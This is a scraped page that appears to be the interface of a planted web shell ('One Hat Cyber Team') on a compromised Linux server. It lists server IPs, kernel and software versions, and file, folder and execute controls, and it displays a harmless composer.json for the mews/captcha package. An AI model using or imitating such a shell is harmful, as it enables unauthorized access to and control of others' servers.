One Hat Cyber Team
Your IP :
172.70.127.240
Server IP :
188.114.96.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
htmlOld
/
vendor
/
mews
/
captcha
/
View File Name :
composer.json
{ "name": "mews/captcha", "type": "package", "description": "Laravel 5/6/7/8/9/10/11 Captcha Package", "keywords": ["laravel6 Captcha", "laravel6 Security", "laravel6 Captcha", "laravel5 Security", "Captcha"], "homepage": "https://github.com/mewebstudio/captcha", "license": "MIT", "authors": [ { "name": "Muharrem ERİN", "email": "me@mewebstudio.com", "homepage": "https://github.com/mewebstudio", "role": "Developer" } ], "require": { "php": "^7.2|^8.1|^8.2|^8.3", "ext-gd": "*", "illuminate/config": "~5|^6|^7|^8|^9|^10|^11", "illuminate/filesystem": "~5|^6|^7|^8|^9|^10|^11", "illuminate/support": "~5|^6|^7|^8|^9|^10|^11", "illuminate/hashing": "~5|^6|^7|^8|^9|^10|^11", "illuminate/session": "~5|^6|^7|^8|^9|^10|^11", "intervention/image": "~2.5" }, "require-dev": { "phpunit/phpunit": "^8.5|^9.5.10|^10.5", "mockery/mockery": "^1.0" }, "autoload": { "psr-4": { "Mews\\Captcha\\": "src/" }, "files": [ "src/helpers.php" ] }, "autoload-dev": { "classmap": [ "tests" ], "psr-4": { "Mews\\Test\\": "tests/" } }, "minimum-stability": "stable", "extra": { "laravel": { "providers": [ "Mews\\Captcha\\CaptchaServiceProvider" ], "aliases": { "Captcha": "Mews\\Captcha\\Facades\\Captcha" } } } }